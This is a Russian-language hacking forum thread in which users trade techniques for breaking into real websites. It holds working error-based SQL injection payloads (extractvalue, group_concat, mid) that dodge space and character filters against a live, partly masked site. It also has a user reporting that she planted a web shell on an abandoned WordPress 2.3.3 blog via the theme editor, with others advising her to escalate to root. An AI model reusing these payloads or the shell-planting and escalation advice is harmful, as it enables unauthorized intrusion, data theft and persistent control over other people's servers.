Вопросы по уязвимостям

[Ctacok]

Цитата:

Сообщение от Tim

если запрещены пробелы, слеши,и прочее, есть ли возможность использовать limit?
limit 1 - пробел строго обязателен, не могу придумать как обойти

https://rdot.org/forum/showthread.php?t=60

[Tim]

Цитата:

Сообщение от Ctacok

https://rdot.org/forum/showthread.php?t=60

этот материал был первым делом изучен, все способы из него перепробованы.
суть проблемы: есть SQLi blind
MySQL 5.1.56
в запросе нельзя использовать / + %
символы %2B, %20, %09, %0d ,%0А, + в скрипте видимо не проходят через urldecode, и попадая в запрос вызывают синтаксическую ошибку

работает вывод в ошибке

Код:

http://www.site.com/path/url1'and(extractvalue(1,concat(0x3a,(select(user())))))and'1/

а вот

Код:

http://www.site.com/path/url1'and(extractvalue(1,concat(0x3a,(select(table_name)from(information_schema.tables)))))and'1/

выдает

Цитата:

Reason: Subquery returns more than 1 row

т.е нужен LIMIT

[S00pY]

group_concat можно например

Щас сек проверю))

Живым примером:

Цитата:

***.com/show.php?num=(577)and(extractvalue(1,concat(0x3a,( select(group_concat(table_name))from(information_s chema.tables)where(table_name)>'CHARACTER_SETS'))) )--+

[Tim]

вот это уже что-то! только > тоже не подходит, т.к. в запрос попадает %3E
like надо как-то заюзать, вот только
where(table_name)like'user%'
перехватывает nginx

Цитата:

400 Bad Request

Нашел
and(extractvalue(1,concat(0x3a,(select(mid(group_c oncat(table_name),100,1024))from(information_schem a.tables)))))

[Rita Dees]

Добрый день.

wp 2.3.3
Заливаю шелл через редактор тем(заменяю код любого пхп-файла на код шелла), сохраняю - все работает.

Захожу через день(и так уже 3 сутки), шелла нет! Как и файла, код которого я заменила.
Если залить второй и т.д. шелл в другие папки, то через сутки(вообщем на следующее утро) этот файл уже не найти.

Другой админ ничего не трогает и не удаляет, т.к. блог забыт так и не открывшись...

[Vollkorn]

Rita Dees, нельзя быть на 100% уверенным в том, что этот блог никому, кроме Вас не нужен. Может какой-то недохакер получил админовские права и не хочет, чтобы другие заливали шелл. Без дополнительных сведений (что за блог, как давно, где он и т.д.) можно придумать кучу вариантов, почему исчезают шеллы.

[Jokester]

Rita Dees
По крону восстанавливается раз в сутки с бекапа скорее всего.
Мне встречалось на каком-то хостере такое что на один вызов шелл отрабатывал, и убивался, но это несколько иная ситуация

[Rita Dees]

Цитата:

Rita Dees, нельзя быть на 100% уверенным в том, что этот блог никому, кроме Вас не нужен. Может какой-то недохакер получил админовские права и не хочет, чтобы другие заливали шелл. Без дополнительных сведений (что за блог, как давно, где он и т.д.) можно придумать кучу вариантов, почему исчезают шеллы.

Я там вообще одна во всей таблице wp_users + пароль трижды измененный!
А блог никому не нужен потому, что дата последних обновлений папок и файлов в директориях совпадает со временем выхода версии 2.3.3 это во первых, а во вторых там не было создано ни одной темы...только установили блог и всё на этом!

Цитата:

По крону восстанавливается раз в сутки с бекапа скорее всего.
Мне встречалось на каком-то хостере такое что на один вызов шелл отрабатывал, и убивался, но это несколько иная ситуация

Это, я так поняла, никак не проверишь? Логи соответствующие я могу найти (средствами шелла)?

[Tim]

раз там все так запущено, поднимай права до рута, и смотри что в кроне (crontab -l), да и логи изучить не лишним будет

[Rita Dees]

Дата последнего обновления - ноябрь 2010 (2.6.28), где в открытом доступе под такое найдешь...